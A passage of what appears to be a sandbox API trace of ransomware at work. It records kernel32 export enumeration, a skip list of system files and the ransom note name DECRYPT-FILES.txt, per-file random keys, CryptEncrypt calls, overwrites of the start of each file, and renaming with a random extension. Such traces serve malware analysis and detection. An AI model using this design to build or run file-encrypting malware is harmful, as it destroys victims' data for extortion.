lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.649] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.649] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.649] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.649] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.649] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.649] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.649] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.649] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.649] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.649] lstrlenA (lpString="DELETEATOM") returned 10 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.649] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.649] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.649] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.649] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.649] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.649] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.649] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.650] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.650] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.650] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.650] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.650] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.650] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.650] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.650] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.650] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.650] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.650] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.650] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.650] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.650] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.650] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.650] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.650] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.650] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.651] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.651] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.651] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.651] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.651] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.651] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.651] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.651] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.651] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.651] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.651] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.651] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.651] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.651] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.651] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.651] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav") returned 61 [0085.652] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav.1hdvP") returned 67 [0085.652] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_clz29qic0hwf92.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav.1hdvP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_clz29qic0hwf92.wav.1hdvp"), dwFlags=0x0) returned 1 [0085.652] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.653] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.653] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.653] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaf441f0, ftCreationTime.dwHighDateTime=0x1d4c585, ftLastAccessTime.dwLowDateTime=0xd1798570, ftLastAccessTime.dwHighDateTime=0x1d4cdd4, ftLastWriteTime.dwLowDateTime=0xd1798570, ftLastWriteTime.dwHighDateTime=0x1d4cdd4, nFileSizeHigh=0x0, nFileSizeLow=0x211c, dwReserved0=0x0, dwReserved1=0x0, cFileName="f_l6zxQPIZe3sHzvN.wav", cAlternateFileName="F_L6ZX~1.WAV")) returned 1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="autorun.inf") returned 1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="boot.ini") returned 1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="desktop.ini") returned 1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="ntuser.dat") returned -1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="iconcache.db") returned -1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="bootsect.bak") returned 1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="ntuser.dat.log") returned -1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="thumbs.db") returned -1 [0085.653] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav", lpString2="Bootfont.bin") returned 1 [0085.653] lstrlenW (lpString="f_l6zxQPIZe3sHzvN.wav") returned 21 [0085.653] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.653] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.653] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.653] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.654] lstrlenW (lpString="f_l6zxQPIZe3sHzvN.wav") returned 21 [0085.654] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0085.654] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="f_l6zxQPIZe3sHzvN.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav" [0085.654] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_l6zxqpize3shzvn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.654] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=8476) returned 1 [0085.654] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.654] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.654] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.654] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.654] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.655] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.655] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.655] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.656] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.656] CloseHandle (hObject=0x42c) returned 1 [0085.656] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.656] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.657] CloseHandle (hObject=0x0) returned 0 [0085.657] CloseHandle (hObject=0x428) returned 1 [0085.657] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.657] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.658] GetTickCount () returned 0x114ddf1 [0085.658] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.658] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.658] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.658] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.658] lstrlenA (lpString="kernel32.dll") returned 12 [0085.658] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.659] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.659] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.659] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.659] lstrlenA (lpString="ADDATOMA") returned 8 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.659] lstrlenA (lpString="ADDATOMW") returned 8 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.659] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.659] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.659] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.659] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.659] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.659] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.659] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.659] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.659] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.659] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.659] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.659] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.659] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.660] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.660] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.660] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.660] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.660] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.660] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.660] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.660] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.660] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.660] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.660] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.660] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.660] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.660] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.660] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.660] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.660] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.660] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.661] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: 